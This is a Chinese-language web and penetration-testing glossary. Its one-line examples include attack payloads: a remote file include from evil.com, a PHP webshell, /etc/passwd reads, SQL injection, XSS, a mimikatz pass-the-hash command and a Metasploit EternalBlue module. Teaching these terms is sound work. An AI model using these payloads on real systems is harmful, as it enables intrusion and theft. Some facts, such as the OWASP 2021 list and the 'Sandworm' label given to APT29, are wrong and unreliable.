安全术语表
共 38 个术语
Web安全 13
CORS
跨源资源共享(Cross-Origin Resource Sharing),控制浏览器是否允许跨域请求。配置不当可能导致安全风险。
Access-Control-Allow-Origin: * 允许任意来源
CSP
内容安全策略(Content Security Policy),通过 HTTP 响应头限制页面可加载的资源来源,有效防御 XSS 攻击。
Content-Security-Policy: script-src 'self'
CSRF
跨站请求伪造(Cross-Site Request Forgery),利用用户已登录的身份,在用户不知情的情况下发送恶意请求。
<img src='http://bank.com/transfer?to=hacker&amount=10000'>
IDOR
不安全的直接对象引用(Insecure Direct Object Reference),应用直接暴露内部对象引用,攻击者通过修改参数访问未授权资源。
/profile.php?id=123 → /profile.php?id=124(查看他人信息)
LFI
本地文件包含(Local File Inclusion),通过用户输入参数包含服务器本地文件,可读取敏感配置或配合日志实现 RCE。
?file=../../../../etc/passwd
RCE
远程代码执行(Remote Code Execution),攻击者可在目标服务器上远程执行任意代码,是最严重的安全漏洞类型之一。
利用反序列化漏洞、命令注入、文件包含等实现 RCE
RFI
远程文件包含(Remote File Inclusion),通过用户输入包含远程恶意文件并执行,可直接获取服务器控制权。
?page=http://evil.com/shell.txt
SQL 注入
通过将恶意 SQL 代码注入到应用程序查询语句中,操纵数据库执行未授权操作,可导致数据泄露、数据篡改甚至服务器控制。
username=' OR '1'='1 --
SSRF
服务端请求伪造(Server-Side Request Forgery),攻击者利用服务器发起请求,访问本不该访问的内网资源。
http://example.com/fetch?url=http://169.254.169.254/metadata
XSS
跨站脚本攻击(Cross-Site Scripting),通过在页面中注入恶意 JavaScript 代码,窃取用户 Cookie、会话令牌或进行钓鱼攻击。
<script>alert(document.cookie)</script>
XXE
XML 外部实体注入(XML External Entity),通过在 XML 解析中引入外部实体,读取服务器文件或发起内网请求。
<!ENTITY xxe SYSTEM 'file:///etc/passwd'>
命令注入
攻击者通过用户输入注入系统命令,在服务器上执行任意命令。通常发生在调用系统命令的功能点。
; cat /etc/passwd 或 | whoami
文件上传漏洞
服务器未正确验证用户上传文件的类型和内容,允许上传恶意脚本(如 WebShell)并在服务器上执行。
上传 .php 文件并通过 /uploads/shell.php 访问执行
加密技术 1
TLS/SSL
传输层安全协议,为网络通信提供加密、身份认证和数据完整性保护。HTTPS 即 HTTP over TLS。
Let's Encrypt 提供免费 SSL 证书
安全标准 1
OWASP Top 10
OWASP 组织每四年发布的最危险 Web 应用安全风险列表,是 Web 安全测试和开发的重要参考标准。
2021 版:注入、失效身份认证、敏感信息泄露、XSS、失效访问控制…
安全设备 4
SIEM
安全信息和事件管理系统,集中收集、分析日志,实时检测安全威胁并告警。
Splunk、IBM QRadar、阿里云安全中心
WAF
Web 应用防火墙(Web Application Firewall),部署在 Web 服务器前,检测并拦截恶意请求,提供 SQL 注入、XSS 等攻击防护。
ModSecurity、BaiWAF、阿里云 WAF
沙箱
隔离的执行环境,用于安全地运行可疑代码或程序,观察其行为而不影响真实系统。
浏览器沙箱、病毒分析沙箱
蜜罐
故意设置的诱饵系统或数据,用于吸引攻击者、收集攻击情报、延缓攻击进度。
部署虚假数据库,记录攻击者行为
密码安全 4
加盐
在密码哈希前添加随机字符串(盐),使相同密码产生不同哈希,有效防御彩虹表攻击。
password_hash('123456', PASSWORD_BCRYPT) 自动加盐
字典攻击
使用常用密码字典进行尝试破解,比暴力破解效率更高,对弱密码效果显著。
rockyou.txt 包含 1400 万个常用密码
彩虹表
预先计算好的哈希-明文对照表,用于快速破解哈希密码。防御方法是使用加盐(Salt)哈希。
Ophcrack 使用彩虹表破解 Windows LM/NTLM Hash
暴力破解
通过尝试所有可能的密码组合来破解密码,密码越长越复杂,破解时间越长。
6位纯密码约 100 万种组合,现代 GPU 毫秒级破解
攻击类型 1
APT
高级持续性威胁(Advanced Persistent Threat),国家级或有组织的长期定向攻击,通常针对政府、金融机构等高价值目标。
APT28、APT29(沙虫组织)
渗透工具 3
Burp Suite
最流行的 Web 安全测试工具集,包含代理、爬虫、扫描器 Intruder、解码器等功能,支持手动和自动化渗透测试。
拦截请求包、修改参数、重放攻击、自动化漏洞扫描
Metasploit
开源渗透测试框架,提供大量已知漏洞的利用模块(Exploit)、攻击载荷(Payload)和辅助模块,可快速构建攻击向量。
msfconsole → use exploit/windows/smb/ms17_010_eternalblue
Nmap
网络发现和安全审计工具,可扫描目标主机的开放端口、服务版本、操作系统指纹,支持服务检测、操作系统检测、漏洞扫描。
nmap -sV -sC -p- 192.168.1.1
渗透测试 4
Hash 传递
在内网渗透中,直接使用抓取到的 NTLM/LM Hash 而不需要破解密码,即可认证访问同网络的另一台机器。
mimikatz # sekurlsa::pth /user:admin /domain:workgroup /ntlm:hash
WebShell
一种恶意脚本,上传到 Web 服务器后,攻击者可远程执行系统命令、管理文件。常见功能:文件管理、命令执行、数据库操作。
<?php system($_GET['cmd']); ?>
权限提升
通过利用系统配置错误、漏洞或弱口令,将普通用户权限提升为管理员或 SYSTEM 权限。
利用 SUID 权限文件漏洞、sudo 配置错误、内核漏洞进行提权
横向移动
在攻陷一台主机后,以此为跳板进一步渗透内网其他主机的过程,常用手法包括 Pass-the-Hash、远程服务利用等。
从 Web 服务器渗透到内网数据库服务器
漏洞分类 1
零日漏洞
尚未被公开、未有补丁的未知漏洞,攻击者可在开发商不知情的情况下开发利用代码,极其危险。
攻击者发现后立即利用,从发现到修复期间称为零日窗口
漏洞标准 1
CVE
通用漏洞披露(Common Vulnerabilities and Exposures),全球统一的漏洞唯一标识编号体系,由 MITRE 公司维护。
CVE-2021-44228(Log4Shell)
社会工程 2
社会工程学
利用人性弱点(信任、恐惧、好奇心)而非技术漏洞获取信息的攻击方式。技术可以修补漏洞,但人心的漏洞永远存在。
假冒 IT 支持人员索要密码
钓鱼攻击
通过伪装成可信实体(银行、公司、朋友)发送虚假信息,诱导受害者点击恶意链接或泄露敏感信息。
伪造银行邮件,诱导用户输入账号密码
认证技术 2
JWT
JSON Web Token,一种无状态的身份认证令牌,由 Header、Payload、Signature 三部分组成。
Authorization: Bearer eyJhbGciOiJIUzI1NiIs...
OAuth 2.0
开放授权协议,允许第三方应用获取用户资源的有限访问权限,而不暴露用户密码。
使用微信/QQ 登录第三方网站
靶机环境 1
DVWA
Damn Vulnerable Web Application,一款故意设计了大量安全漏洞的 Web 应用,用于学习各种 Web 攻击与防御技术。
包含 SQL 注入、XSS、CSRF、文件包含、命令注入等漏洞模块